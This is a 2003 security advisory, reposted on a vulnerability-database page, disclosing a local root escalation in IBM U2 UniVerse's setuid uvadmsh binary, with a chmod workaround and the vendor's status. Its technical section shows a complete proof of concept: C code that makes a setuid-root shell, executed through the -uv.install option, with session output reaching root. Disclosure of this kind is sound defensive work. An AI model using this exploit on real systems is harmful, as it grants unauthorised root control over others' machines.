Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormStrategic Reconnaissance TeamPACKETSTORM:31368
HistoryJul 17, 2003 - 12:00 a.m.

SRT2003-07-07-0833.txt

2003-07-1700:00:00
Strategic Reconnaissance Team
packetstormsecurity.com
22
JSON
`Secure Network Operations, Inc. http://www.secnetops.com  
Strategic Reconnaissance Team [email protected]  
Team Lead Contact [email protected]  
  
  
Our Mission:  
************************************************************************  
Secure Network Operations offers expertise in Networking, Intrusion   
Detection Systems (IDS), Software Security Validation, and   
Corporate/Private Network Security. Our mission is to facilitate a   
secure and reliable Internet and inter-enterprise communications   
infrastructure through the products and services we offer.   
  
  
Quick Summary:  
************************************************************************  
Advisory Number : SRT2003-07-07-0833  
Product : IBM U2 UniVerse  
Version : Version <= 10.0.0.9 ?  
Vendor : http://ibm.com/software/data/u2/universe/  
Class : local  
Criticality : High (to UniVerse servers with local users)   
Operating System(s) : Only confirmed on Linux (other unix based?)  
  
  
High Level Explanation  
************************************************************************  
High Level Description : users with uvadm rights can take root  
What to do : chmod -s /usr/ibm/uv/bin/uvadmsh  
  
  
Technical Details  
************************************************************************  
Proof Of Concept Status : SNO Does have PoC code for this issue.   
Low Level Description :   
  
UniVerse is an extended relational database designed for embedding in   
vertical applications. Its nested relational data model results in   
intuitive data modeling and fewer resulting tables. UniVerse provides   
data access, storage and management capabilities across Microsoft®  
Windows® NT, Linux and UNIplatform.  
  
The creation and use of the Unix user 'uvadm' is optional for UniVerse.   
It is not required for the successfull installation, configuration and  
administration of UniVerse. The intended use of uvadm is to allow a  
selected, specific non-root user to perform all aspects of UniVerse  
administration.  
  
The uvadmsh program checks the users name against the string "uvadm"  
which means in order to exploit this issue you need to have access to  
the user uvadm.   
  
[kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp  
...  
strcmp("kf", "uvadm") = -1  
  
[uvadm@vegeta uvadm]$ id  
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)  
  
You will note that with the proper uid the binary begins looking for   
the command line option "-uv.install" which is the path to a binary  
file to execute.  
  
[uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp  
...  
strcmp("uvadm", "uvadm") = 0  
strcmp("-uv.install", "-uv.install") = 0  
  
This condition is fairly easy to take advantage of as you can see here.   
  
[uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c  
main()  
{  
setuid(0);  
system("cc -o /tmp/owned /tmp/owned.c");  
system("chmod 4755 /tmp/owned");  
}  
  
[uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c  
[uvadm@vegeta uvadm]$ cat > /tmp/owned.c  
main()  
{  
setuid(0);  
system("/bin/bash");  
}  
  
[uvadm@vegeta uvadm]$ ls -al /tmp/owned  
ls: /tmp/owned: No such file or directory  
  
[uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp  
[uvadm@vegeta uvadm]$ ls -al /tmp/owned  
-rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned  
  
[uvadm@vegeta uvadm]$ /tmp/owned  
[root@vegeta uvadm]# id  
uid=0(root) gid=503(uvadm) groups=503(uvadm)  
  
Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh  
  
Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user  
to perform all of the uvadmsh functions.  
  
Vendor Status : The IBM U2 staff will have this issue resolved   
in a future release of IBM U2. Patches may also be supplied on a per   
client basis at IBM's disgression.   
  
Bugtraq URL : to be assigned  
  
------------------------------------------------------------------------  
This advisory was released by Secure Network Operations,Inc. as a matter  
of notification to help administrators protect their networks against  
the described vulnerability. Exploit source code is no longer released  
in our advisories. Contact [email protected] for information on how  
to obtain exploit information.  
  
  
`
JSON